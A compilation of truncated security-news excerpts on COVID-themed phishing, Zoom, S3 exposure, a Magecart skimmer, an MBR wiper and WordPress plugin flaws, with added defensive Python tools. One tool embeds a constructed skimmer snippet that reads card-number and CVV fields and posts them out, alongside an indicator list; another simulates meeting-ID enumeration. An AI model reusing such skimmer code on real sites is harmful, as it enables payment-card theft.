Researchers have discovered threat actors once again capitalizing on the COVID-19 pandemic and the current attention on the World Health Organization (WHO), this time with a spearphishing email that uses the WHO trademark as a lure to spread the LokiBot trojan. Researchers at FortiGuard Labs first observed the malicious COVID-19-themed scam on March 27. The message claims to come from the WHO and purports to address misinformation related to the pandemic in order to convince users it is authentic; its attachment drops the LokiBot infostealer if downloaded and executed, according to a blog post published Thursday by threat analyst Val Saengphaibul. “The body of the email contains multiple points about infection control and other suggestions and recommendations, which is obviously a lure to further compel the recipient to continue reading,” he wrote in the post. “And in a twisted fashion, the messaging pretends to address misinformation related to COVID-19/Coronavirus.” While the message, written in English, has legitimate characteristics, the threat actors behind it are likely not native English speakers, judging by “some obvious grammatical, punctuation and spelling issues,” Saengphaibul pointed out. The message also makes an obvious blunder by claiming to come from the “WHO Center for Disease Control,” conflating the Switzerland-based WHO with the U.S. Centers for Disease Control and Prevention (CDC), two entirely separate organizations. Moreover, in the body of the message, the author…

On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days. Overall, eight security bugs were addressed in Chrome version 80.0.3987.162 for Windows, Mac and Linux. The most severe of these flaws could allow arbitrary code execution, according to the Center for Internet Security (CIS). “Successful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,” according to CIS in a Wednesday alert. “Depending on the privileges associated with the application, an attacker could view, change, or delete data. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.” As is typical for Chrome updates, Google is initially sparing with details of the bugs “until a majority of users are updated with a fix.” It did outline three of the vulnerabilities that were discovered by external researchers, however. These include two high-severity vulnerabilities in the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications. Both CVE-2020-6450 and CVE-2020-6451 are use-after-free flaws. Use…

Zoom has nixed a feature that came under fire for “undisclosed data mining” of users’ names and email addresses, which were used to match them with their LinkedIn profiles. The feature, LinkedIn Sales Navigator, is a LinkedIn service used for sales prospecting. When users entered a web conference meeting, the tool automatically sent their user names and email addresses to an internal Zoom system, which then matched this data to their LinkedIn profiles, according to a New York Times investigation. Per The New York Times, the tool also automatically allowed other meeting participants to covertly access this LinkedIn profile data, without Zoom asking for users’ permission or notifying them. That means that if a user was in a Zoom meeting, even under a name other than their real one, other participants could collect information about their real names, locations, employer names and job titles. The tool was removed on Thursday as part of several sweeping changes Zoom made in response to snowballing security and privacy concerns. Zoom founder Eric Yuan said in a Wednesday post responding to the concerns that Zoom will freeze the development of new features and instead focus on security and privacy issues. “Over the next 90 days, we are committed to dedicating the resources needed to better identify, address and fix issues proactively,” said Yuan. “We are also committed to being transparent throughout this process. We want to do what it takes to maintain your trust.” With…

Phishing attacks looking to take advantage of interest and fear around the COVID-19 health crisis are becoming a pandemic themselves, and cybercriminals appear to be conserving resources by leaning on their older stockpiles of weapons to keep the infection wave going. Or Katz, a researcher at Akamai, said in a posting on Thursday that older phishing kits that were previously deployed and then retired are being pressed back into service in order to target those working from home. In fact, Akamai researchers have seen recycled phishing kits from as far back as July being used in coronavirus-themed phishing attacks now. Millions of Americans are telecommuting due to self-isolation, mandated quarantine or corporate policies as coronavirus infections continue to spike. Akamai’s team, like many others in the security community, has recently observed phishing attacks that start with SMS messages or emails that direct victims to domains “seemingly related to COVID-19 news, governmental updates, or health-related products and services.” In the latest attacks, which have been seen globally, victims who click the link are directed to one domain and then immediately redirected to another. The second domain spoofs big brands like Microsoft, Orange France and eBay, or health resources such as the World Health Organization or local medical experts. “By pretending to be an insurance company, bank, medical expert or other trusted brand, criminals are convincing victims to…

As the coronavirus pandemic continues to force people to work from home, countless companies are now holding daily meetings over Zoom's videoconferencing service. But without the protection of a password, there's a decent chance your next Zoom meeting could be "Zoom bombed": attended or disrupted by someone who doesn't belong. And according to data gathered by a new automated Zoom meeting discovery tool dubbed "zWarDial," a large number of meetings at major corporations are not protected by a password. According to its makers, zWarDial can find on average 110 meetings per hour, with a success rate of around 14 percent. Each Zoom conference call is assigned a Meeting ID of 9 to 11 digits. Naturally, attackers have figured out they can simply guess, or automate the guessing of, random IDs within that space. Security experts at Check Point Research did exactly that last summer, and found they were able to predict approximately four percent of randomly generated Meeting IDs. The Check Point researchers said enabling passwords on each meeting was the only thing that prevented them from randomly finding a meeting. Zoom responded by saying it was enabling passwords by default in all future scheduled meetings. Zoom also said it would block repeated attempts to scan for meeting IDs, and that it would no longer automatically indicate whether a meeting ID was valid or invalid….
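The three controls named above (per-meeting passwords, blocking repeated scans, and no longer revealing whether an ID is valid) each change what a random-ID scanner can learn. The simulation below is an added example, not zWarDial, Check Point's tooling or Zoom's service: it models a join endpoint and a scanner against a constructed, deliberately tiny ID space (10,000 IDs, 100 live meetings) so that hits occur in a few thousand probes, and it assumes meeting IDs are allocated uniformly at random. The real space is every 9-, 10- and 11-digit number, which the `expected_probes_per_hit` helper uses.

```python
"""Simulated meeting-ID enumeration against a mock join endpoint.

Constructed model (not Zoom's real service or ID allocation): it only shows how
the three controls the article names change what a random-ID scanner learns.
"""
import random

# Real ID space: every 9-, 10- and 11-digit meeting ID (assumed uniform).
REAL_ID_SPACE = 10**9 + 10**10 + 10**11

# Toy parameters so the simulation finds something in a few thousand probes.
TOY_ID_SPACE = 10_000
LIVE_MEETINGS = 100
ATTEMPTS = 5_000
MAX_PROBES = 100


class JoinService:
    """Mock join endpoint. `live` maps meeting ID -> password (None = no password)."""

    def __init__(self, live, reveal_validity=True, max_probes=None):
        self.live = live
        self.reveal_validity = reveal_validity
        self.max_probes = max_probes
        self.probes = {}  # client -> number of join attempts seen

    def join(self, client, meeting_id, password=None):
        """Return 'joined', 'invalid', 'password_required' or 'blocked'."""
        n = self.probes.get(client, 0) + 1
        self.probes[client] = n
        if self.max_probes is not None and n > self.max_probes:
            return "blocked"  # repeated scanning from one client is cut off
        if meeting_id not in self.live:
            # A validity oracle tells the scanner this ID is unused. A hardened
            # service answers exactly as it would for a live, protected meeting.
            return "invalid" if self.reveal_validity else "password_required"
        needed = self.live[meeting_id]
        if needed is None or needed == password:
            return "joined"
        return "password_required"


def scan(service, client, space, attempts, rng):
    """Probe random IDs and return what the scanner could conclude."""
    joined, confirmed, blocked = set(), set(), 0
    for _ in range(attempts):
        mid = rng.randrange(space)
        answer = service.join(client, mid)
        if answer == "blocked":
            blocked += 1
        elif answer == "joined":
            joined.add(mid)
            confirmed.add(mid)
        elif answer == "password_required" and service.reveal_validity:
            confirmed.add(mid)  # ID is known to be live; only the password is missing
    return {"joined": len(joined), "confirmed": len(confirmed), "blocked": blocked}


def expected_probes_per_hit(live_count, space=REAL_ID_SPACE):
    """Average random guesses per live ID when IDs are uniformly allocated."""
    return space / live_count


def run_scenarios():
    """Run one scan under each control and return the per-scenario results."""
    ids = random.Random(7).sample(range(TOY_ID_SPACE), LIVE_MEETINGS)
    open_meetings = {i: None for i in ids}
    protected = {i: "s3cret" for i in ids}
    scenarios = {
        "open": JoinService(open_meetings),
        "passwords_with_oracle": JoinService(protected),
        "passwords_no_oracle": JoinService(protected, reveal_validity=False),
        "rate_limited": JoinService(open_meetings, max_probes=MAX_PROBES),
    }
    return {name: scan(svc, "scanner", TOY_ID_SPACE, ATTEMPTS, random.Random(1))
            for name, svc in scenarios.items()}


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name:24s} {result}")
```

Passwords alone stop the scanner from joining but, while the service still answers "invalid" for unused IDs, every password prompt confirms a live meeting that can be targeted later; removing that oracle is what turns the scan into noise, and the per-client cap bounds how much noise one scanner can generate.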

Key Ring, creator of a digital wallet app used by 14 million people across North America, has exposed 44 million IDs, charge cards, loyalty cards, gift cards and membership cards to the open internet, researchers say. The Key Ring app allows users to upload scans and photos of various physical cards into a digital folder on the user’s phone. While Key Ring is primarily designed for storing membership cards for loyalty programs, users also store more sensitive cards in the app. According to the research team at vpnMentor, it found 44 million scans exposed in misconfigured cloud storage, including: government IDs, retail club membership and loyalty cards, NRA membership cards, gift cards, credit cards with all details exposed (including CVV numbers), medical insurance cards and medical marijuana ID cards, among others. vpnMentor said that it found a total of five misconfigured Amazon Web Services (AWS) S3 buckets owned by the company. These could have revealed millions of the uploads to anyone with a web browser because the buckets were left publicly accessible (S3 buckets are not password-protected; access is governed by their ACLs and bucket policies), the company said. Every file could also be downloaded and stored offline. Threatpost reached out to Key Ring’s media team multiple times over the last few days for a comment or reaction to the findings, with no response, and will update this post with any additional information should the company eventually respond.
Five Databases of Information
According to the research, launched Thursday…
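The misconfiguration class here is a bucket whose ACL or bucket policy grants access to everyone, with S3 Block Public Access switched off. The checks below are an added example, not vpnMentor's tooling or anything from Key Ring; they run offline over constructed policy, ACL and public-access-block documents shaped like the JSON that the boto3 calls `get_bucket_policy`, `get_bucket_acl` and `get_public_access_block` return. The bucket name `example-uploads`, the account ID `123456789012` and the role name are placeholders.

```python
"""Offline checks for world-readable S3 buckets.

Added example, not vpnMentor's tooling. The documents below are constructed
samples in the shape boto3 returns for get_bucket_policy, get_bucket_acl and
get_public_access_block; bucket, account and role names are placeholders.
"""
import json

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}


def _principals(principal):
    """Normalise a policy Principal (string or map of lists) to a flat list."""
    if isinstance(principal, str):
        return [principal]
    if isinstance(principal, dict):
        out = []
        for value in principal.values():
            out.extend(value if isinstance(value, list) else [value])
        return out
    return []


def public_policy_statements(policy_doc):
    """Return Allow statements whose principal is the wildcard (anonymous access)."""
    policy = json.loads(policy_doc) if isinstance(policy_doc, str) else policy_doc
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    findings = []
    for st in statements:
        if st.get("Effect") == "Allow" and "*" in _principals(st.get("Principal")):
            actions = st.get("Action", [])
            findings.append({
                "sid": st.get("Sid"),
                "actions": actions if isinstance(actions, list) else [actions],
                # A Condition may narrow the grant; report it rather than trust it.
                "conditioned": "Condition" in st,
            })
    return findings


def public_acl_grants(acl):
    """Return ACL grants to the AllUsers / AuthenticatedUsers groups."""
    findings = []
    for grant in acl.get("Grants", []):
        uri = grant.get("Grantee", {}).get("URI")
        if uri in PUBLIC_GRANTEES:
            findings.append({"who": PUBLIC_GRANTEES[uri], "permission": grant.get("Permission")})
    return findings


def public_access_block_complete(config):
    """True only when all four S3 Block Public Access settings are enabled."""
    required = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")
    return all(config.get(key) is True for key in required)


def assess_bucket(policy_doc, acl, pab_config):
    """Combine the three checks into one verdict for a bucket."""
    return {
        "public_policy": public_policy_statements(policy_doc) if policy_doc else [],
        "public_acl": public_acl_grants(acl),
        "block_public_access": public_access_block_complete(pab_config),
    }


# Constructed samples: a bucket left world-readable, and a locked-down one.
OPEN_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-uploads/*"}]})
OPEN_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}
NO_BLOCK = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
            "BlockPublicPolicy": False, "RestrictPublicBuckets": False}

LOCKED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "AppOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
     "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": "arn:aws:s3:::example-uploads/*"}]})
LOCKED_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner"},
                          "Permission": "FULL_CONTROL"}]}
FULL_BLOCK = {key: True for key in NO_BLOCK}

if __name__ == "__main__":
    print("open bucket:  ", assess_bucket(OPEN_POLICY, OPEN_ACL, NO_BLOCK))
    print("locked bucket:", assess_bucket(LOCKED_POLICY, LOCKED_ACL, FULL_BLOCK))
```

Wire the three functions to the corresponding boto3 calls per bucket to run this across an account; the account-level `put_public_access_block` with all four flags true is the setting that would have prevented both the ACL and the policy paths here regardless of what individual buckets carry.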

Researchers have observed a new skimmer from the prolific Magecart Group that has been actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months. RiskIQ researchers first discovered the skimmer, dubbed MakeFrame for its use of iframes to skim data, on Jan. 24. Since then, they’ve captured several different versions of the skimmer with “various levels of obfuscation,” researchers Jordan Herman and Mia Ihm wrote in a blog post published Thursday. The versions range from development versions in clear code to finalized versions using encrypted obfuscation, they wrote. “This version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,” Herman and Ihm wrote. “It is nestled in amongst benign code to blend in and avoid detection.” MakeFrame also leeches off the compromised site for its functionality, a technique that in particular alerted researchers that MakeFrame is most likely the work of Magecart Group 7. Targeting SMB sites, as MakeFrame does, is also indicative of Magecart Group 7 activity, researchers said. “In some cases, we’ve seen MakeFrame using compromised sites for all three of its functions — hosting the skimming code itself, loading the skimmer on other compromised websites and exfiltrating the stolen data,” Herman and Ihm wrote. Indeed, Magecart Group 7 typically uses victim sites for skimmer development, which was also…
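A "blob of hex-encoded terms nestled in benign code" is cheap to triage statically: decode the `\xHH` runs and look at what the plaintext references. The script below is an added example, not RiskIQ's detection logic and not MakeFrame's code; both sample scripts are constructed here, with the skimmer-like one built by hex-escaping its telltale terms and dropping it between two benign statements, as the article describes. The indicator list and the threshold of three hits are assumptions for the example.

```python
"""Static triage for hex-escape-obfuscated skimmer code.

Added example, not RiskIQ's detection logic. Both sample scripts are constructed
here; the only thing taken from the article is the pattern it describes.
"""
import re

# Runs of three or more \xHH escapes; single escapes occur in benign code too.
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}")
HEX_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Decoded terms that, taken together, point at form-grabbing and exfiltration.
INDICATORS = {
    "iframe": "injects an iframe",
    "cc_number": "reads a card-number field",
    "cvv": "reads a CVV field",
    "checkout": "targets the checkout flow",
    "onsubmit": "hooks form submission",
    "xmlhttprequest": "sends data out",
    "btoa": "base64-encodes the harvest",
}


def decode_hex_runs(script):
    """Return the plaintext of every \\xHH run found in `script`."""
    decoded = []
    for match in HEX_RUN.finditer(script):
        raw = bytes(int(h, 16) for h in HEX_BYTE.findall(match.group()))
        decoded.append(raw.decode("latin-1"))
    return decoded


def triage(script, threshold=3):
    """Decode the hex runs and score the script by indicator terms they reveal."""
    decoded = decode_hex_runs(script)
    haystack = " ".join(decoded).lower()
    hits = {term: why for term, why in INDICATORS.items() if term in haystack}
    return {
        "hex_runs": len(decoded),
        "decoded": decoded,
        "indicators": hits,
        "suspicious": len(hits) >= threshold,
    }


def hex_escape(text):
    """Encode `text` the way the obfuscator does; used to build the sample below."""
    return "".join("\\x%02x" % ord(c) for c in text)


# Constructed: ordinary tracking-pixel code with plain string literals.
BENIGN = "var img=new Image();img.src='/pixel.gif?page='+encodeURIComponent(location.pathname);"

# Constructed: skimmer-style code whose telltale terms are hex-escaped, placed
# between benign statements so it blends in.
SKIMMER = (
    BENIGN
    + "var f=document.createElement('" + hex_escape("iframe") + "');"
    + "document.forms[0]['" + hex_escape("onsubmit") + "']=function(){"
    + "var d=btoa(document.querySelector('#" + hex_escape("cc_number") + "').value"
    + "+'|'+document.querySelector('#" + hex_escape("cvv") + "').value);"
    + "var x=new window['" + hex_escape("XMLHttpRequest") + "']();"
    + "x.open('POST','/'+'" + hex_escape("checkout") + "'+'/cache.php');x.send(d);};"
    + "document.title=document.title;"
)

if __name__ == "__main__":
    for label, script in (("benign", BENIGN), ("skimmer", SKIMMER)):
        result = triage(script)
        print(label, result["suspicious"], sorted(result["indicators"]))
```

Run `triage` over every first- and third-party script a checkout page loads; a hit on a script that also differs from the copy in source control is worth a manual look, since the article notes the same compromised sites host the skimmer, load it elsewhere and receive the stolen data.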

A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply “Coronavirus.” Overwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, global financial damage. Worryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan. And like its namesake, there’s no cure. In a posting on Tuesday, researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, “Your computer has been trashed.” The novel coronavirus, and the disease it causes, COVID-19, has provided a wealth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. For instance, a recent spate of phishing attacks has used the promise of financial relief due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to adopt the coronavirus as its name and infection theme. As for the infection routine, the malware can be delivered in any of the usual ways: as a malicious email attachment, file download, fake application and so on. Upon execution, the malware starts by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An…
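The MBR is the first 512-byte sector of the disk: boot code, a four-entry partition table at offset 446, and the 0x55AA boot signature in the last two bytes. Whether that sector has been trashed is therefore easy to check from a disk image or a raw device, which is the first question an incident responder asks before attempting a repair. The parser below is an added example, not SonicWall's analysis tooling, and it contains nothing from the Coronavirus trojan itself; the healthy and wiped sectors it examines are constructed inline, and the heuristic (missing signature, empty table, or junk status bytes) is the author's, not a claim about what this particular wiper writes.

```python
"""Check whether a disk's first sector still looks like a sane MBR.

Added example, not SonicWall's tooling; the 512-byte sectors below are constructed
and nothing here reproduces the Coronavirus trojan's own code.
"""
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
BOOT_SIGNATURE = b"\x55\xaa"
ENTRY_FORMAT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    """Decode the boot signature and the four partition-table slots."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    partitions = []
    for slot in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * slot
        status, _, ptype, _, lba_start, sectors = struct.unpack(ENTRY_FORMAT, sector[off:off + 16])
        if ptype == 0 and lba_start == 0 and sectors == 0:
            continue  # empty slot
        partitions.append({
            "slot": slot,
            "bootable": status == 0x80,
            "status_valid": status in (0x00, 0x80),  # anything else is not a real entry
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return {"signature_ok": sector[510:512] == BOOT_SIGNATURE, "partitions": partitions}


def mbr_looks_overwritten(sector):
    """Heuristic: missing signature, empty table or junk status bytes all mean trouble."""
    info = parse_mbr(sector)
    if not info["signature_ok"] or not info["partitions"]:
        return True
    return any(not p["status_valid"] for p in info["partitions"])


def build_sample_mbr():
    """Constructed healthy MBR: a few bytes of boot code and one bootable NTFS partition."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c".ljust(PARTITION_TABLE_OFFSET, b"\x00")
    entry = struct.pack(ENTRY_FORMAT, 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 1_000_000)
    table = entry + b"\x00" * 48  # three empty slots
    return boot_code + table + BOOT_SIGNATURE


# Constructed "trashed" sectors: one overwritten end to end with a fill pattern, and
# one where only the partition table was zeroed while the signature survived.
TRASHED_WHOLE = b"\xde\xad\xbe\xef" * 128
TRASHED_TABLE_ONLY = bytes(PARTITION_TABLE_OFFSET) + bytes(64) + BOOT_SIGNATURE

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. a raw image, or /dev/sda with sufficient privileges
        with open(sys.argv[1], "rb") as fh:
            data = fh.read(SECTOR_SIZE)
    else:
        data = build_sample_mbr()
    print(parse_mbr(data))
    print("overwritten:", mbr_looks_overwritten(data))
```

The second trashed sample matters in practice: a wiper that leaves 0x55AA in place still defeats a check that only looks at the signature, so the table itself has to be inspected. On a wiped system the partition data is usually still on disk, so a backup of this one sector, or the partition table recovered from partition-boot-record backups, is what a repair starts from.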

Researchers are warning of a surge in social-engineering lures in malicious emails that promise victims financial relief during the coronavirus pandemic. The slew of campaigns piggybacks on news of governments mulling financial relief packages in response to the economic stall brought on by consumers social distancing. This latest trend shows cybercriminals continuing to use the newest developments in the coronavirus saga as leverage for phishing campaigns, targeted emails spreading malware and more. “These campaigns use the promise of payments by global governments and businesses (specifically financial institutions) aimed at easing the economic impact of the ongoing pandemic to urge users to click links or download files,” said Proofpoint researchers, in analysis released Wednesday. One credential-phishing campaign has been spotted primarily targeting U.S. healthcare and higher-education organizations (as well as the technology industry, including information-security companies), with a message purporting to be from their payroll departments. The emails, titled “General Payroll !”, explain that the Trump administration “is considering” sending most American adults a check to help stimulate the economy. “The Trump administration is considering sending most American adults a check for $1,000 as part of the efforts to stimulate the economy and help workers whose jobs have been disrupted by business closures because of the pandemic,” says the message….

A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin known as Rank Math could allow remote attackers to elevate privileges and install malicious redirects on a target site, according to researchers. The plugin has more than 200,000 installations. According to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 severity scale): it allows an unauthenticated attacker to update arbitrary metadata, which can be abused to grant or revoke administrative privileges for any registered user on the site. The second vulnerability is rated high-severity (7.4 on the same scale) and allows an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice. Wordfence disclosed the bugs to the developer of the add-on (its full name is “WordPress SEO Plugin – Rank Math”) on March 24; CVE tracking numbers are forthcoming, the researchers said in an analysis released Tuesday. A patch is available in the latest version, 1.0.41.1, so site administrators should update.
Critical Metadata Flaw
Rank Math allows users to update the metadata on website posts, which is where the bug lies, according to the technical analysis Wordfence published on Tuesday. The plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called…
